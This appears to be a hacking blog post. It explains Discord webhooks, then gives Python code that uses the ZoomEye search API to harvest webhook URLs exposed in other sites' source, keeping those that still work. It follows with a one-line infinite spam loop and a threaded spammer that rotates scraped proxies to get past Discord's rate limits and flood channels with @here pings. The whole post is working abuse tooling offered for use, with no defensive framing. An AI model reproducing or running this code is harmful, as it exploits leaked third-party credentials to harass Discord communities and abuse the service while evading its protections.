Scrape discord webhooks and check if they're valid
A Discord webhook is a way to send automated messages to a specific channel on Discord.
Discord webhooks are often used to integrate external services, such as monitoring bots or logging bots, with Discord chat channels.
They allow you to automate the sending of messages, notifications or updates based on specific predefined conditions or events.
Overall, webhooks make it easy to automate communications between Discord and other applications or services by allowing users to receive real-time notifications within Discord chats.
When you create a webhook, you get a unique URL that can be used to send HTTP POST requests containing messages to send to the desired Discord channel.
Often and willingly frontend developers put their webhook in the source code of their site.
Searching webhooks
So, a discord webhook URL is structured like this: https://discord.com/api/webhooks/[WEBHOOK ID]/[WEBHOOK TOKEN].
Via the content parameter, you can send a message through a POST request, and yes, you can ping everyone with @here or @everyone.
A simple ZoomEye search can give us the desired results.
[*] zoomeye_results.png
But... can I automate this?
The answer is obviously yes,
I made this script without the ZoomEye SDK library but only with HTTP requests and a bit of regex,
which scrapes around all the pages,
parse and check webhooks storing the valid ones.
here is the code
import requests,re
print("""\n\tZoomeye discord webhook scraper\n\tBy komodo
\t\t ||\n\t\t ||\n\t\t //\n\t\t// |\\\n\t\t\\\\_//
""");api_key=input("Api Key: ")
rep=set();sus:int=1;D="https://discord.com/api/webhooks"
def check(webhook:str) -> bool:
return requests.get(webhook).ok
def fix(webhook:str)->str:
if check(webhook[:-1]):
return webhook[:-1]
return webhook
while True:
print(f"Scraping at page {sus}")
try:
params={"query": f'{D}',"page": sus}
response=requests.get("https://api.zoomeye.org/host/search",headers={"Authorization":f"{api_key}"},params=params)
pattern=re.compile(r'\b{}\b'.format(D))
matches=[match.span()[0] for match in pattern.finditer(response.text)]
for i in matches:
cook=fix(response.text[i:i+0x79])
if check(cook) and cook not in rep:
print(f"Valid webhook found: {cook}")
with open("webhookz.txt","a") as thew:thew.write(cook+"\n")
else:print(f"Invalid or repeated webhook: {cook}")
if response.text.startswith('{"code": 50005, "error"'):quit("Cannot scrape any other webhooks.")
except Exception as e: print(f"Error: {e}")
finally: sus += 1
The simplest and oneliner way to spam into a webhook in Python is the following
while True: __import__("requests").post("[webhookurl]",data={"content":"@here hey"})
But if you're searching for a simple and threaded webhook spammer with proxy support (scraped automatically), I wrote this.
here is the code
import requests, threading, re
owo=open(input("Webhooks file: "), "r").read().splitlines()
body=requests.get("https://sslproxies.org").text
proxies:list=body[body.find("UTC.\n")+6:44116].splitlines()
proxies = re.compile(r'\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b:\d+').findall(body)
COUNT:int=0
class Task(threading.Thread):
def run(f, a:tuple):
threading.Thread(target=f, args=a, daemon=True).start()
def main(webhook, content):
global COUNT
proxyuwu={"http":"http://%s"%proxies[COUNT]}
try:
r = requests.post(webhook,data={"content":content},proxies=proxyuwu)
if r.ok:
print(f'"{content}" successfully sent.')
elif r.status_code==429:
if COUNT>=len(proxies)-1: COUNT=0
else: COUNT+=1
except: pass
try:
c = str(input("content: "))
while True:
for lel in owo:
Task.run(main,(lel,c))
except Exception as neg: exit("SUS")
